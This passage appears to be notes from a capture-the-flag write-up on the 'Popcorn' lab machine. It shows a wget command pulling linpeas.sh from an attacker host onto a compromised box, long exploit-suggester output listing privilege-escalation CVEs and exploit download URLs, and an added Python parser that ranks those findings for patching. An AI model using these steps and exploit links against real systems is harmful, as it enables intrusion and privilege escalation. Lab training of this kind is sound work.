PEAS


www-data@popcorn:/dev/shm$ wget http://10.10.14.5:8000/linpeas.sh ; chmod 777 linpeas.sh
--2023-02-02 13:12:24--  http://10.10.14.5:8000/linpeas.sh
connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 827827 (808K) [text/x-sh]
saving to: `linpeas.sh'
 
100%[======================================>] 827,827     2.56M/s   in 0.3s    
 
2023-02-02 13:12:24 (2.56 MB/s) - `linpeas.sh' saved [827827/827827]
 

Delivery complete

Executing PEAS

╔══════════╣ Executing Linux Exploit Suggester
 https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
 
   details: http://vulnfactory.org/exploits/full-nelson.c
   exposure: highly probable
   tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server}
   download url: http://vulnfactory.org/exploits/full-nelson.c
 
[+] [CVE-2016-5195] dirtycow
 
   details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   exposure: probable
   tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
   download url: https://www.exploit-db.com/download/40611
   comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
 
[+] [CVE-2016-5195] dirtycow 2
 
   details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   exposure: probable
   tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   download url: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
 
[+] [CVE-2010-3904] rds
 
   details: http://www.securityfocus.com/archive/1/514379
   exposure: probable
   tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},[ ubuntu=10.10|9.10 ],fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},ubuntu=10.04{kernel:2.6.32-(21|24)-generic}
   download url: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c
 
[+] [CVE-2010-3848,CVE-2010-3850,CVE-2010-4073] half_nelson
 
   details: https://www.exploit-db.com/exploits/17787/
   exposure: probable
   tags: [ ubuntu=(10.04|9.10) ]{kernel:2.6.(31|32)-(14|21)-server}
   download url: https://www.exploit-db.com/download/17787
 
[+] [CVE-2010-1146] reiserfs
 
   details: https://jon.oberheide.org/blog/2010/04/10/reiserfs-reiserfs_priv-vulnerability/
   exposure: probable
   tags: [ ubuntu=9.10 ]
   download url: https://jon.oberheide.org/files/team-edward.py
 
[+] [CVE-2010-0832] PAM MOTD
 
   details: https://www.exploit-db.com/exploits/14339/
   exposure: probable
   tags: [ ubuntu=9.10|10.04 ]
   download url: https://www.exploit-db.com/download/14339
   comments: SSH access to non privileged user is needed
 
[+] [CVE-2021-3156] sudo Baron Samedit
 
   details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   exposure: less probable
   tags: mint=19,ubuntu=18|20, debian=10
   download url: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit 2
 
   details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   exposure: less probable
   tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   download url: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   exposure: less probable
   tags: ubuntu=20.04{kernel:5.8.0-*}
   download url: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   comments: ip_tables kernel module must be loaded
 
[+] [CVE-2019-18634] sudo pwfeedback
 
   details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   exposure: less probable
   tags: mint=19
   download url: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   comments: sudo configuration requires pwfeedback to be enabled.
 
[+] [CVE-2017-6074] dccp
 
   details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   exposure: less probable
   tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
   download url: https://www.exploit-db.com/download/41458
   comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
 
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
 
   details: https://seclists.org/oss-sec/2017/q1/184
   exposure: less probable
   download url: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
 
[+] [CVE-2017-1000370,CVE-2017-1000371] linux_offset2lib
 
   details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   exposure: less probable
   download url: https://www.qualys.com/2017/06/19/stack-clash/linux_offset2lib.c
   comments: Uses "Stack Clash" technique
 
[+] [CVE-2017-1000366,CVE-2017-1000371] linux_ldso_dynamic
 
   details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   exposure: less probable
   tags: debian=9|10,ubuntu=14.04.5|16.04.2|17.04,fedora=23|24|25
   download url: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_dynamic.c
   comments: Uses "Stack Clash" technique, works against most SUID-root PIEs
 
[+] [CVE-2017-1000366,CVE-2017-1000370] linux_ldso_hwcap
 
   details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   exposure: less probable
   download url: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap.c
   comments: Uses "Stack Clash" technique, works against most SUID-root binaries
 
[+] [CVE-2017-0358] ntfs-3g-modprobe
 
   details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
   exposure: less probable
   tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
ffensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
   comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
 
[+] [CVE-2016-6663,CVE-2016-6664|CVE-2016-6662] mysql-exploit-chain
 
   details: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
   exposure: less probable
   tags: ubuntu=16.04.1
   download url: http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
   comments: Also MariaDB ver<10.1.18 and ver<10.0.28 affected
 
[+] [CVE-2014-5119] __gconv_translit_find
 
   details: http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html
   exposure: less probable
   tags: debian=6
   download url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34421.tar.gz
 
[+] [CVE-2014-0196] rawmodePTY
 
   details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
   exposure: less probable
   download url: https://www.exploit-db.com/download/33516
 
[+] [CVE-2013-0268] msr
 
   details: https://www.exploit-db.com/exploits/27297/
   exposure: less probable
   download url: https://www.exploit-db.com/download/27297
 
[+] [CVE-2010-4347] american-sign-language
 
   details: https://www.exploit-db.com/exploits/15774/
   exposure: less probable
   download url: https://www.exploit-db.com/download/15774
 
[+] [CVE-2010-3437] pktcdvd
 
   details: https://www.exploit-db.com/exploits/15150/
   exposure: less probable
   tags: ubuntu=10.04
   download url: https://www.exploit-db.com/download/15150
 
[+] [CVE-2010-3301] ptrace_kmod2
 
   details: https://www.exploit-db.com/exploits/15023/
   exposure: less probable
   tags: debian=6.0{kernel:2.6.(32|33|34|35)-(1|2|trunk)-amd64},ubuntu=(10.04|10.10){kernel:2.6.(32|35)-(19|21|24)-server}
   download url: https://www.exploit-db.com/download/15023
 
[+] [CVE-2010-3081] video4linux
 
   details: https://www.exploit-db.com/exploits/15024/
   exposure: less probable
   tags: RHEL=5
   download url: https://www.exploit-db.com/download/15024
 
[+] [CVE-2010-2959] can_bcm
 
   details: https://www.exploit-db.com/exploits/14814/
   exposure: less probable
   tags: ubuntu=10.04{kernel:2.6.32-24-generic}
   download url: https://www.exploit-db.com/download/14814
 
[+] [CVE-2009-3547] pipe.c 3
 
   details: https://www.exploit-db.com/exploits/10018/
   exposure: less probable
   download url: https://www.exploit-db.com/download/10018
 
[+] [CVE-2009-3547] pipe.c 2
 
   details: https://www.exploit-db.com/exploits/33322/
   exposure: less probable
   download url: https://www.exploit-db.com/download/33322
 
[+] [CVE-2009-3547] pipe.c 1
 
   details: https://www.exploit-db.com/exploits/33321/
   exposure: less probable
   download url: https://www.exploit-db.com/download/33321
 
 
╔══════════╣ Executing Linux Exploit Suggester 2
 https://github.com/jondonas/linux-exploit-suggester-2
  [1] american-sign-language
      CVE-2010-4347
      source: http://www.securityfocus.com/bid/45408
  [2] can_bcm
      CVE-2010-2959
      source: http://www.exploit-db.com/exploits/14814
  [3] dirty_cow
      CVE-2016-5195
      source: http://www.exploit-db.com/exploits/40616
  [4] do_pages_move
      alt: sieve       CVE-2010-0415
      source: Spenders Enlightenment
  [5] exploit_x
      CVE-2018-14665
      source: http://www.exploit-db.com/exploits/45697
  [6] half_nelson1
      alt: econet       CVE-2010-3848
      source: http://www.exploit-db.com/exploits/17787
  [7] half_nelson2
      alt: econet       CVE-2010-3850
      source: http://www.exploit-db.com/exploits/17787
  [8] half_nelson3
      alt: econet       CVE-2010-4073
      source: http://www.exploit-db.com/exploits/17787
  [9] msr
      CVE-2013-0268
      source: http://www.exploit-db.com/exploits/27297
  [10] pipe.c_32bit
      CVE-2009-3547
      source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
  [11] pktcdvd
      CVE-2010-3437
      source: http://www.exploit-db.com/exploits/15150
  [12] ptrace_kmod2
a32syscall,robert_you_suck       CVE-2010-3301
      source: http://www.exploit-db.com/exploits/15023
  [13] rawmodePTY
      CVE-2014-0196
      source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
  [14] rds
      CVE-2010-3904
      source: http://www.exploit-db.com/exploits/15285
  [15] reiserfs
      CVE-2010-1146
      source: http://www.exploit-db.com/exploits/12130
  [16] video4linux
      CVE-2010-3081
      source: http://www.exploit-db.com/exploits/15024

So many vulnerabilities were found because the target system is extremely old
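
An added example (not part of the original notes or of either tool): a parser that merges the two suggester outputs above into one de-duplicated CVE list ranked by the reported exposure, the form a patch-prioritization list would take. The names `triage`, `report` and `SAMPLE` are assumptions of this example, and the sample input is constructed from entries shown above.

```python
import re
from collections import defaultdict

# Constructed sample: LES "[+] [CVE,...] name" blocks, then LES2 "[n] name" blocks.
SAMPLE = """\
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
   exposure: highly probable
[+] [CVE-2016-5195] dirtycow
   exposure: probable
[+] [CVE-2016-6663,CVE-2016-6664|CVE-2016-6662] mysql-exploit-chain
   exposure: less probable
   download url: http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
  [3] dirty_cow
      CVE-2016-5195
      source: http://www.exploit-db.com/exploits/40616
  [6] half_nelson1
      alt: econet       CVE-2010-3848
"""

CVE = re.compile(r"CVE-\d{4}-\d{4,}")
RANK = {"highly probable": 0, "probable": 1, "less probable": 2, "unrated": 3}

def triage(text):
    """Map each CVE to its best exposure rating and every finding name citing it."""
    found = defaultdict(lambda: {"exposure": "unrated", "names": set()})
    name, cves, les2 = None, [], False
    for line in map(str.strip, text.splitlines()):
        if m := re.match(r"\[\+\] \[(.+?)\] (.+)", line):    # LES entry header
            name, cves, les2 = m.group(2), CVE.findall(m.group(1)), False
        elif m := re.match(r"\[\d+\] (\S+)", line):           # LES2 entry header
            name, cves, les2 = m.group(1), [], True
        elif les2 and not line.startswith("source:"):         # LES2 CVE line, URLs skipped
            cves = CVE.findall(line)
        elif line.startswith("exposure:"):                    # LES rating line
            rating = line.split(":", 1)[1].strip()
            for c in cves:
                if RANK.get(rating, 3) < RANK[found[c]["exposure"]]:
                    found[c]["exposure"] = rating
        for c in cves:                    # idempotent: names is a set
            found[c]["names"].add(name)
    return found

def report(found):
    """Rows of (cve, exposure, names), most exposed first."""
    rows = [(c, v["exposure"], sorted(v["names"])) for c, v in found.items()]
    return sorted(rows, key=lambda r: (RANK[r[1]], r[0]))

for row in report(triage(SAMPLE)):
    print(*row)
```

CVE strings inside `details:`, `download url:` and `source:` URLs are deliberately not counted, and findings that only Linux Exploit Suggester 2 reports come out as `unrated` because that tool prints no exposure field.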

There is a compiler installed. This is nice as I wouldn’t need to compile exploits remotely

More detailed SUID binaries

The /selinux directory is new to me

PEAS also picked up the DB credentials